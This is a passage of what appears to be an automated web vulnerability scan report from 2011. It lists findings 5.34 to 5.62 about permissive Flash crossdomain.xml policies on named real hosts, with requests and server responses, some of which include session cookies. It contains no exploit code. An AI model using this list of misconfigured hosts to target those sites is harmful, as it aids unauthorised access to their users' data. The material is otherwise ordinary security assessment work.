5.34. http://img2.catalog.video.msn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://img2.catalog.video.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img2.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "efb12b8c8413cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 177
Age: 153211
Date: Tue, 19 Jul 2011 12:24:00 GMT
Last-Modified: Thu, 24 Jun 2010 10:03:51 GMT
Expires: Sun, 31 Jul 2011 17:50:29 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>

5.35. http://img3.catalog.video.msn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://img3.catalog.video.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img3.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "efb12b8c8413cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 177
Age: 375813
Date: Tue, 19 Jul 2011 12:23:56 GMT
Last-Modified: Thu, 24 Jun 2010 10:03:51 GMT
Expires: Fri, 29 Jul 2011 04:00:23 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>

5.36. http://img4.catalog.video.msn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://img4.catalog.video.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img4.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "efb12b8c8413cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 177
Age: 74735
Date: Tue, 19 Jul 2011 12:23:58 GMT
Last-Modified: Thu, 24 Jun 2010 10:03:51 GMT
Expires: Mon, 01 Aug 2011 15:38:23 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>

5.37. http://in.getclicky.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://in.getclicky.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: in.getclicky.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 12:25:25 GMT
Server: Apache
Last-Modified: Wed, 13 Jul 2011 23:34:25 GMT
ETag: "5e4041-c9-4a7fbdb512240"
Accept-Ranges: bytes
Content-Length: 201
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

5.38. http://log50.doubleverify.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://log50.doubleverify.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: log50.doubleverify.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sun, 17 Jan 2010 08:19:04 GMT
Accept-Ranges: bytes
ETag: "0ccdbb4d97ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 20:44:45 GMT
Connection: close
Content-Length: 378

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.39. http://media.fastclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.fastclick.net

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 12:24:04 GMT
Server: Apache/2.2.4 (Unix)
P3P: CP="NOI DSP DEVo TAIo COR PSA OUR IND NAV"
Content-Length: 202
Keep-Alive: timeout=5, max=19943
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

5.40. http://metrics.boston.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.boston.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.boston.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:14 GMT
Server: Omniture DC/2.0.0
xserver: www54
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

5.41. http://metrics.ticketmaster.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.ticketmaster.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.ticketmaster.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:41 GMT
Server: Omniture DC/2.0.0
xserver: www388
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

5.42. http://metrics.versionone.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.versionone.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.versionone.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:22:36 GMT
Server: Omniture DC/2.0.0
xserver: www316
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

5.43. http://now.eloqua.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/xml
Last-Modified: Tue, 26 May 2009 19:46:00 GMT
Accept-Ranges: bytes
ETag: "04c37983adec91:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Tue, 19 Jul 2011 14:20:43 GMT
Connection: keep-alive
Content-Length: 206

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
   SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

5.44. http://pixel.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 19 Jul 2011 20:43:03 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

5.45. http://pixel.quantserve.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 20 Jul 2011 20:43:03 GMT
Content-Type: text/xml
Content-Length: 207
Date: Tue, 19 Jul 2011 20:43:03 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

5.46. http://puma.vizu.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://puma.vizu.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: puma.vizu.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:44:21 GMT
Server: PWS/1.7.2.3
X-Px: ht iad-agg-n5.panthercdn.com
ETag: "9c515-10d-8b2eaf40"
P3P: CP="DSP NID OTP UNR STP NON", policyref="/w3c/p3p.xml"
Cache-Control: max-age=604800
Expires: Sun, 24 Jul 2011 23:38:44 GMT
Age: 162337
Content-Length: 269
Content-Type: text/xml
Last-Modified: Thu, 09 Jun 2011 20:46:13 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-
...[SNIP]...

5.47. http://r.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Tue, 19 Jul 2011 20:43:05 GMT
Content-Type: text/xml;charset=UTF-8
Date: Tue, 19 Jul 2011 20:43:04 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

5.48. http://s3.amazonaws.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s3.amazonaws.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s3.amazonaws.com

Response

HTTP/1.1 200 OK
x-amz-id-2: 8xNjpRAu7Xx/lc8DphWv07o3cZv3vHeaXvqTPrAsacX72TjBxMXQD9zfgIcW9o8Q
x-amz-request-id: 5E5F0DAE9BC0C977
Date: Tue, 19 Jul 2011 18:37:18 GMT
Content-Type: text/xml
Connection: close
Server: AmazonS3

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" secure="false" /></cross-domain-pol
...[SNIP]...

5.49. http://secure.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 18:37:05 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Mon, 17-Oct-2011 18:37:05 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml
Connection: close
Content-Length: 255

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.50. http://segment-pixel.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 19 Jul 2011 14:28:35 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

5.51. http://statse.webtrendslive.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: statse.webtrendslive.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:906"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 14:20:28 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

5.52. http://stubhub.tt.omtrdc.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://stubhub.tt.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: stubhub.tt.omtrdc.net

Response

HTTP/1.1 200 OK
ETag: W/"201-1310753133000"
Accept-Ranges: bytes
Content-Length: 201
Date: Tue, 19 Jul 2011 18:36:24 GMT
Connection: close
Last-Modified: Fri, 15 Jul 2011 18:05:33 GMT
Server: Test & Target
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

5.53. http://t.mookie1.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.mookie1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: t.mookie1.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:58 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 15 Jun 2011 21:26:36 GMT
ETag: "62fc00b-c9-4a5c6cea6fb00"
Accept-Ranges: bytes
Content-Length: 201
Keep-Alive: timeout=15, max=12
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

5.54. http://wa.stubhub.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://wa.stubhub.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: wa.stubhub.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:25 GMT
Server: Omniture DC/2.0.0
xserver: www379
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

5.55. http://www.clickmanage.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clickmanage.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.clickmanage.com

Response

HTTP/1.1 200 OK
Content-Length: 207
Content-Type: text/xml
Last-Modified: Mon, 13 Apr 2009 20:38:54 GMT
Accept-Ranges: bytes
ETag: "5cabdfdc77bcc91:758"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 14:20:23 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

5.56. http://add.my.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://add.my.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: add.my.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:29:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

5.57. http://api.bing.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bing.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.bing.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Content-Length: 634
Content-Type: text/xml
Last-Modified: Fri, 01 Oct 2010 21:58:33 GMT
ETag: A06DD1053D1686DFCEF21D90E3BAD7190000027A
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Tue, 19 Jul 2011 14:28:14 GMT
Connection: close
Set-Cookie: _FS=ui=en-US&mkt=en-US; domain=.bing.com; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*.bing.com" he
...[SNIP]...
<allow-access-from domain="*.bing.com"/>
...[SNIP]...
<allow-access-from domain="blstc.msn.com"/>
...[SNIP]...
<allow-access-from domain="stc.sandblu.msn-int.com"/>
...[SNIP]...

5.58. http://api.choicestream.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.choicestream.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.choicestream.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
X-CS-Request-Id: 3e8c982c-edf3-440f-ac84-7c9c506acd07
P3P: policyref="http://www.choicestream.com/w3c/p3p.xml",CP="NOI DSP COR NID ADMa DEVa PSAo PSDo OUR STP"
Last-Modified: Tue, 19 Jul 2011 18:36:30 GMT
Content-Type: application/xml
Content-Length: 296
Date: Tue, 19 Jul 2011 18:36:30 GMT
Connection: close
Set-Cookie: JSESSIONID=E24BC6DACCEFBC905E29E6A3B7BC7373; Path=/instr
Set-Cookie: __cs_sp=1; Domain=.choicestream.com; Expires=Wed, 18-Jul-2012 18:36:30 GMT; Path=/
Set-Cookie: CSAnywhere=823c0d1c-2cc2-444c-b394-ea0d63b3dc5e; Domain=.choicestream.com; Expires=Wed, 18-Jul-2012 18:36:30 GMT; Path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">


<cross-domain-policy>
<site-control permitted-cross-domain-policies="m
...[SNIP]...
<allow-access-from domain="*.choicestream.com" />
...[SNIP]...

5.59. http://b.myspace.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://b.myspace.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.myspace.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 23 Jun 2009 18:35:39 GMT
Accept-Ranges: bytes
ETag: "cf2446831f4c91:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 14:28:32 GMT
Connection: keep-alive
Content-Length: 365

...<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.myspace.com"/>
   <allow-http-request-headers-from doma
...[SNIP]...

5.60. http://cdn.stumble-upon.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cdn.stumble-upon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.stumble-upon.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 31 May 2011 21:14:03 GMT
Content-Type: application/xml
Content-Length: 460
Date: Tue, 19 Jul 2011 14:28:26 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="www.stumbleupon.com" />
   <allow-access-from domain="*.stumble.net" />
   <allow-access-from domain="stumble.net" />
   <allow-access-from domain="*.stumbleupon.com" />
   <allow-access-from domain="stumbleupon.com" />
...[SNIP]...

5.61. http://cgi.ebay.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cgi.ebay.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cgi.ebay.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
last-modified: Wed, 27 Oct 2010 13:21:58 GMT
Content-Type: application/xml
Content-Length: 3890
Date: Tue, 19 Jul 2011 18:36:23 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.ebay.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.au" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.at" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.be" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ca" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.com.cn" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.de" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.com.hk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.in" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ie" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.it" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.com.my" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.nl" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.nz" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ph" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.pl" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.sg" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.es" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ch" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebayrtm.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebaystatic.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.verve8media.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.westernfreight.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ru" secure="false"/>
...[SNIP]...

5.62. http://developers.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://developers.facebook.com
Path:   /crossdomain.xml

Issue detail

